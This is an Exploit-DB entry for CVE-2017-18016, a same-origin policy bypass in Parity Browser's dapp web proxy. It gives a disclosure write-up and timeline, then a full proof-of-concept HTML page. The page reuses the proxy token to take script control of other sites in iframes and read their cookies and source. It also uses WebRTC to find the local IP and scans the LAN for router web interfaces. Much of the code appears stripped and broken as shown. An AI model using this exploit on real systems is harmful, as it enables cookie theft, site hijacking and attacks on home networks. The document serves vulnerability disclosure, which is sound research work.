Parity Browser < 1.6.10 - Bypass Same Origin Policy

EDB-ID: 43499
Author: tintinweb
Published: 2018-01-10
CVE: CVE-2017-18016
Type: Local
Platform: Multiple
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A


Author: <>
Version: 0.3
Date: Jun 16th, 2017

Tag: parity same origin policy bypass webproxy token reuse


Name: parity
Vendor: paritytech
References: * [1]

Version: 1.6.8
Latest Version: 1.7.12 (stable) - fixed
1.8.5 (beta) - fixed
Other Versions: <= 1.6.10 (stable) - vulnerable
Platform(s): cross
Technology: rust js

Vuln Classes: CWE-346
Origin: local (remote website, malicious dapp)
Min. Privs.: ---

CVE: CVE-2017-18016


quote website [1]

>Parity Technologies is proud to present our powerful new Parity Browser. Integrated directly into your Web browser, Parity is the fastest and most secure way of interacting with the Ethereum network.


PoC: [4]

> Parity Browser <=1.6.8 allows remote attackers to bypass the Same Origin Policy and obtain sensitive information by requesting other websites via the Parity web proxy engine (reusing the current website's token, which is not bound to an origin).

![parity cookie](sop_cookie.gif)

**(A)** Ethereum Parity's built-in dapp/web-browsing functionality is
rendering browser same-origin policy (SOP) ineffective by proxying
requests with the parity main process. As a result, any website
navigated to ends up being origin http://localhost:8080. This also means
that all websites navigated to share the same origin and thus are not
protected by the browser SOP allowing any proxied website/dapp to access
another proxied website/dapp's resources (Cookies, ...).

//see attached PoC - index.html / PoC

![parity frame](sop_frame.gif)

**(B)** Worse, due to the structure of proxy cache urls and the fact that they
contain a reusable non-secret non-url specific cache-token it is
possible for one proxied website/dapp to navigate to any other proxied
website/dapp gaining full script/XHR control due to **(A)** the SOP being
applied without any restrictions. This could allow a malicious
website/dapp to take control of another website/dapp, performing user
interactions, XHR or injecting scripts/DOM elements to mislead the
user or to cause other unspecified damage.

When navigating to a website with the built-in parity webbrowser a webproxy request
token is requested and sent along an encoded request for an url. For example, navigating
parity to the url gets turned into a proxy url like of
the form[base32_encode(token+url)]. A malicious dapp can use
this information to decode its own url, extract the token and reuse it for any other
url as the token is not locked to the url. The PoC exploits this in order to load any
other website into a same-origin iframe by reusing the proxy token.

Code see [2]

//see attached PoC - index.html / PoC

Proof of Concept


* (if hosted locally) modify /etc/hosts to resolve your testdomain to your webserver
* make `index.html` accessible on a webserver (e.g. `cd /path/to/index.html; python -m SimpleHTTPServer 80`)

1. launch parity, navigate to the built-in webbrowser (
2. navigate the built-in parity webbrowser to where the PoC `index.html` is hosted (e.g. [4])
3. follow the instructions.
4. Issue 1: navigate to some websites to have them set cookies, reload the PoC page and click "Display Cookies". Note that while the main request is proxied by parity, subsequent calls might not be (e.g. xhr, resources). That means you'll only see cookies set by the main site as only the initial call shares the origin `localhost:8080`.
5. Issue 2: enter an url into the textbox and hit `Spawn SOP Iframe`. A new iframe will appear on the bottom of the page containing the proxied website. Note that the calling website has full script/dom/xhr access to the proxied target. You can also use the "Display Cookies" button from Issue 1 to show cookies that have been merged into the origin by loading the proxied iframe.
6. Demo 2: Just a PoC to find local-lan web interfaces (e.g. your gateways web interface) and potentially mess with its configuration (e.g. router with default password on your lan being reconfigured by malicious dapp that excploits the token reuse issue 2)

//tested with latest chrome


* Commit [3] (first in 1.7.0)
* Does not fix Issue #1 - sites are generally put into same origin due to proxy
* Fixes Issue #2 - Token Reuse
* Parity now added a note that browsing websites with their browser is insecure

![parity fixed](v171.png)

* Issue #1 is not yet fixed as the cookie of is still shown.
* Parity v1.7.12 added a note.


31.05.2017 - first contact, forwarded to parity
17.06.2017 - provided PoC
19.06.2017 - response: not critical issue due to internal browser being a dapp browser and not a generic web browser
20.06.2017 - provided more information
21.06.2017 - response: not critical issue due to internal browser being a dapp browser and not a generic web browser
21.06.2017 - response: follow-up - looking into means to lock the token to a website
22.06.2017 - fix ready [3]
10.01.2018 - public disclosure




<!DOCTYPE html>
<html xmlns="" xml:lang="en" lang="en">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="cve-2017-18016 paritytech parity same origin policy bypass sop">
<meta name="author" content="">
<!--<link rel="icon" href="favicon.ico">-->

<title>Ethereum | Parity SOP Vulnerability</title>
<link rel="stylesheet" href="" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link rel="stylesheet" href="" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous">
<script src="" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>

<script type="text/javascript">

// This would be the place to edit if you want a different
// Base32 implementation

var alphabet = '0123456789ABCDEFGHJKMNPQRSTVWXYZ'.toLowerCase()
var alias={}
//var alias = { o:0, i:1, l:1, s:5 }

* Build a lookup table and memoize it
* Return an object that maps a character to its
* byte value.

var lookup = function() {
var table = {}
// Invert 'alphabet'
for (var i = 0; i < alphabet.length; i++) {
table[alphabet[i]] = i
// Splice in 'alias'
for (var key in alias) {
if (!alias.hasOwnProperty(key)) continue
table[key] = table['' + alias[key]]
lookup = function() { return table }
return table

* A streaming encoder
* var encoder = new base32.Encoder()
* var output1 = encoder.update(input1)
* var output2 = encoder.update(input2)
* var lastoutput = encode.update(lastinput, true)

function Encoder() {
var skip = 0 // how many bits we will skip from the first byte
var bits = 0 // 5 high bits, carry from one byte to the next

this.output = ''

// Read one byte of input
// Should not really be used except by "update"
this.readByte = function(byte) {
// coerce the byte to an int
if (typeof byte == 'string') byte = byte.charCodeAt(0)

if (skip < 0) { // we have a carry from the previous byte
bits |= (byte >> (-skip))
} else { // no carry
bits = (byte << skip) & 248

if (skip > 3) {
// not enough data to produce a character, get us another one
skip -= 8
return 1

if (skip < 4) {
// produce a character
this.output += alphabet[bits >> 3]
skip += 5

return 0

// Flush any remaining bits left in the stream
this.finish = function(check) {
var output = this.output + (skip < 0 ? alphabet[bits >> 3] : '') + (check ? '$' : '')
this.output = ''
return output

* Process additional input
* input: string of bytes to convert
* flush: boolean, should we flush any trailing bits left
* in the stream
* returns: a string of characters representing 'input' in base32

Encoder.prototype.update = function(input, flush) {
for (var i = 0; i < input.length; ) {
i += this.readByte(input[i])
// consume all output
var output = this.output
this.output = ''
if (flush) {
output += this.finish()
return output

// Functions analogously to Encoder

function Decoder() {
var skip = 0 // how many bits we have from the previous character
var byte = 0 // current byte we're producing

this.output = ''

// Consume a character from the stream, store
// the output in this.output. As before, better
// to use update().
this.readChar = function(char) {
if (typeof char != 'string'){
if (typeof char == 'number') {
char = String.fromCharCode(char)
char = char.toLowerCase()
var val = lookup()[char]
if (typeof val == 'undefined') {
// character does not exist in our lookup table
return // skip silently. An alternative would be:
// throw Error('Could not find character "' + char + '" in lookup table.')
val <<= 3 // move to the high bits
byte |= val >>> skip
skip += 5
if (skip >= 8) {
// we have enough to preduce output
this.output += String.fromCharCode(byte)
skip -= 8
if (skip > 0) byte = (val << (5 - skip)) & 255
else byte = 0


this.finish = function(check) {
var output = this.output + (skip < 0 ? alphabet[bits >> 3] : '') + (check ? '$' : '')
this.output = ''
return output

Decoder.prototype.update = function(input, flush) {
for (var i = 0; i < input.length; i++) {
var output = this.output
this.output = ''
if (flush) {
output += this.finish()
return output

/** Convenience functions
* These are the ones to use if you just have a string and
* want to convert it without dealing with streams and whatnot.

// String of data goes in, Base32-encoded string comes out.
function encode(input) {
var encoder = new Encoder()
var output = encoder.update(input, true)
return output

// Base32-encoded string goes in, decoded data comes out.
function decode(input) {
var decoder = new Decoder()
var output = decoder.update(input, true)
return output

* sha1 functions wrap the hash function from Node.js
* Several ways to use this:
* var hash = base32.sha1('Hello World')
* base32.sha1(process.stdin, function (err, data) {
* if (err) return console.log("Something went wrong: " + err.message)
* console.log("Your SHA1: " + data)
* }
* base32.sha1.file('/my/file/path', console.log)

var crypto, fs
function sha1(input, cb) {
if (typeof crypto == 'undefined') crypto = require('crypto')
var hash = crypto.createHash('sha1')
hash.digest = (function(digest) {
return function() {
return encode(, 'binary'))
if (cb) { // streaming
if (typeof input == 'string' || Buffer.isBuffer(input)) {
try {
return cb(null, sha1(input))
} catch (err) {
return cb(err, null)
if (!typeof input.on == 'function') return cb({ message: "Not a stream!" })
input.on('data', function(chunk) { hash.update(chunk) })
input.on('end', function() { cb(null, hash.digest()) })

// non-streaming
if (input) {
return hash.update(input).digest()
return hash
sha1.file = function(filename, cb) {
if (filename == '-') {
return sha1(process.stdin, cb)
if (typeof fs == 'undefined') fs = require('fs')
return fs.stat(filename, function(err, stats) {
if (err) return cb(err, null)
if (stats.isDirectory()) return cb({ dir: true, message: "Is a directory" })
return sha1(require('fs').createReadStream(filename), cb)

var base32 = {
Decoder: Decoder,
Encoder: Encoder,
encode: encode,
decode: decode,
sha1: sha1

if (typeof window !== 'undefined') {
// we're in a browser - OMG!
window.base32 = base32

if (typeof module !== 'undefined' && module.exports) {
// nodejs/browserify
module.exports = base32

<script type="text/javascript">
function new_parity_proxy_url(destination){
//get current webproxy token (we'll just be reusing this one)
var url_decoded = base32.decode(\/(.*)$/)[1]);
var token = url_decoded.split("+")[0];
console.log(token + "+" + destination);
var new_url = document.location.origin + "/web/" + base32.encode(token + "+" + destination).toUpperCase();
return new_url;

function sop_iframe_inject (destination){
d = document.createElement("div");;"border-style: dashed";

d_data = document.createElement("div");

i = document.createElement("iframe");
i.sandbox = "allow-same-origin allow-forms allow-pointer-lock allow-scripts allow-popups allow-modals"; = "resize: both; overflow: auto;"
var proxied_url = new_parity_proxy_url(destination);
i.onload = function() {
//fix the document removing the injection script

var doc = i.contentWindow.document;
var doc_html = doc.documentElement.outerHTML;
doc_html = doc_html.replace("<script src=\"\/parity-utils\/inject.js\"><\/script>","").replace("<\/head><body style=\"background-color: #FFFFFF;\">","");;

i.contentDocument.head.innerHTML = "<title>INJECTED</title>";
// just do anything
i.contentDocument.body.prepend("!--> Injected from parent frame!");
d_data.innerHTML = "<br><br>";
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] we have full control over iframe:'+destination+'</div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] Child Frames Cookie value: <pre>' + i.contentDocument.cookie + '<pre></div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] Child Frames dom title: <pre>' + i.contentDocument.head.title + '<pre></div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] Child Frames window.location.href: <pre>' + i.contentWindow.location.href + '<pre></div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] we have prepended a body element :<b>!--> Injected from parent frame!</b></div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] we have removed inject.js from the target frame:'+destination+'<br></div>';
d_data.innerHTML +='<div class="alert alert-warning" role="alert">[x] source (via xhr): <textarea>'+getUrl(proxied_url).responseText+'</textarea></div>';

//navigate to url (poor mans location setter :p)

function get_lan_ip(cb){
window.RTCPeerConnection = window.RTCPeerConnection || window.mozRTCPeerConnection || window.webkitRTCPeerConnection; //compatibility for firefox and chrome
var pc = new RTCPeerConnection({iceServers:[]}), noop = function(){};
pc.createDataChannel(""); //create a bogus data channel
pc.createOffer(pc.setLocalDescription.bind(pc), noop); // create offer and set local description
pc.onicecandidate = function(ice){ //listen for candidate events
if(!ice || !ice.candidate || !ice.candidate.candidate) return;
var myIP = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(ice.candidate.candidate)[1];
pc.onicecandidate = noop;

function getUrl(url){
var xhr = new XMLHttpRequest;'GET', url, false); //synchronous.
return xhr;

function find_local_web_interfaces(){
/** find routers on local lan segment
try .1 and .254 first, otherwise bruteforce
var local_ip_netpart = local_ip.split(".").slice(0,3).join(".")
console.log("your local ip: "+local_ip);
console.log("testing lan segment: " + local_ip_netpart);

function get_candidate_ips(base){
var ret = new Array();
for(var i=2; i<254; i++){
return ret;

var candidate_ips = get_candidate_ips();

for (i=0;i<candidate_ips.length;i++){
//synchronously. avoid dos'ing parity prx
var probe_ip = local_ip_netpart + "." + candidate_ips[i];
console.log("probing "+probe_ip);
var parity_probe_url = new_parity_proxy_url("http://"+probe_ip);
if (getUrl(parity_probe_url).status<400){
console.log("HIT! - "+probe_ip+" is available! " +parity_probe_url);
if (document.getElementById("stop_on_first_hit").checked) return;

<!-- Fixed navbar -->
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<a class="navbar-brand" href="#">Parity Vulnerability</a>
<div id="navbar" class="navbar-collapse collapse">
<ul class="nav navbar-nav">
<li class="active"><a href="#">Home</a></li>
<li><a href="#contact">Contact</a></li>
</div><!--/.nav-collapse -->

<div class="container theme-showcase" role="main">

<!-- Main jumbotron for a primary marketing message or call to action -->
<div class="jumbotron">
<h1>Parity SOP Bypass</h1>
<p>Same-Origin Policy Bypass in Parity's Dapp Browser</p>
<div class="well">
<pre>/* This program is free software. It comes without any warranty, to
* the extent permitted by applicable law. You can redistribute it
* and/or modify it under the terms of the GNU General Public License,
* Version 2, as published by the Free Software Foundation. See
* for more details. */ </pre></p>
<button type="button" class="btn btn-primary" onclick="alert('Ok, thanks ;)')">I agree!</button>

<div class="jumbotron">
<h1 class="display-4">Issue #1</h1>
<p class="lead">Same-Origin Policy (SOP) bypass vulnerability due to parity proxying websites</p>
<hr class="my-4">
Every webpage you browse to with parity's built-in browser ( is proxied via
For example, when you browse to
<li>'s the websites origin changes to</li>
<li>Navigating to changes the origin to as it is proxied via parity.</li>
Both websites therefore share the same origin rendering a core feature of modern web browsers - the <b>Same-Origin Policy</b> - ineffective.
A website is same-origin if <b>proto, host and port</b> (iexplore does not check port) match.
Bypassing the SOP gives full control over XHR and DOM of child nodes (including iframe source) with the same origin.
<div class="alert alert-warning" role="alert">
<span class="badge badge-warning">Warning</span> This means, as there's only <u>one origin for all websites</u>, non domain restricted cookies are effectively shared with all websites.
<b><span class="badge badge-primary">DEMO #1</span> Cookies shared with other websites</b>
<li>1) using parity's built-in browser, navigate to any website to set a cookie (e.g.</li>
<li>2) reload this this PoC ( </li>
<li>3) hit the <b>Display Cookies</b> button</li>
<p class="lead">
<textarea id="txtdomcookie"></textarea><br>
<a class="btn btn-primary btn-lg" role="button" onclick="document.getElementById('txtdomcookie').value=document.cookie">Display Cookies</a>
<div class="jumbotron">
<h1 class="display-4">Issue #2</h1>
<p class="lead">Parity WebProxy Token Reuse vulnerability</p>
<hr class="my-4">
<div>When navigating to a website with the built-in parity webbrowser a webproxy request token is requested and sent along an encoded request for an url. For example, navigating parity to the url gets turned into a proxy url like of the form[base32_encode(token+url)].</div>


<div class="alert alert-warning" role="alert">
<span class="badge badge-warning">Warning</span> When navigating to the website can detect that it has been proxied by checking the location.href.
It can further base32 decode and extract the web-proxy token and simply reuse it as the token is not bound to any specifiy request url or hostname allowing any website to create proxy urls and navigate to any other website.
<div class="alert alert-info" role="alert">
<span class="badge badge-info">Info</span> The parity webbrowser does not allow a proxied website to change the top frames location or open new windows (iframe sandbox).
<div class="alert alert-warning" role="alert">
<span class="badge badge-warning">Warning</span> However, it allows to perform XHR or embed iframes with script access to proxied locations of arbitrary websites. This allows one website to control any other website since they're both same origin (Issue 1).
<div class="alert alert-info" role="alert">
<span class="badge badge-info">Info</span> The controlling website has full scripting access to sub-iframes potentially allowing for service enumeration attacks or simulate user interaction.
<b><span class="badge badge-primary">DEMO #2</span> Full control of arbitrary websites via token reuse and SOP bypass</b>
<li>1) enter url into the textbox</li>
<li>2) hit <b>Spawn SOP Iframe</b></li>
<li><span class="badge badge-light">Note</span> the current page can modify/inject arbitrary DOM/scripting into the iframe, access cookies (only the ones stored for, potentially from prevs sessions with parity), manipulate change and reload the websites content (e.g. removing parity's inject.js), get the source via XHR</li>
<li><span class="badge badge-light">Note</span> some websites may not load due to js errors. However, since the website has full control it is likely the calling website can fix any js errors occuring in the subframe.</li>
<li><span class="badge badge-light">Note</span> Untested but likely possible: Prepare a transaction to send off ether via parity/web3 api or xhr, open an iframe or perform requests to directly authorize (may require unlock secret) or redress the UI to clickjack the authorization or perform other actions messing with the users account</li>
<p class="lead">
<a class="btn btn-primary btn-lg" role="button" onclick="sop_iframe_inject(document.getElementById('dst').value)">Spawn SOP Iframe</a>
<input type=text value="" id="dst">

<b><span class="badge badge-primary">DEMO #3</span> (Chrome) get local lan ip and service scan for web-enabled devices on the LAN to mess with them</b><br>
e.g. search for local router interfaces with default passwords and reconfigure it to perform DNS based redirection attacks (mitm) or similar
<li>1) click 'Find LAN-Local WebInterfaces' to scan for devices listening on http port 80 within your LAN (IP .1 to .254)</li>
<li>2) an iframe with full control will be created for each device found on the lan</li>
<li>Note: might require some fixups for the iframe conted to be loaded completely due to parity webproxy messing with header scripts or websites unable to be loaded via iframes. XHR should work though and CSRF tokens can be read from XHR requests or iframe dom (if dom based). See javascript console for debug.</li>

<p class="lead">
<a class="btn btn-primary btn-lg" role="button" onclick="find_local_web_interfaces()">Find LAN-Local WebInterfaces</a>
<input type="checkbox" value="stop_on_first_hit" name="stop_on_first_hit" id="stop_on_first_hit"><label for="stop_on_first_hit">Stop on first device</label>


<div class="page-header">
<h1 id="contact">Contact</h1>
<a href="">//tintinweb</a>
</div> <!-- /container -->

Related Posts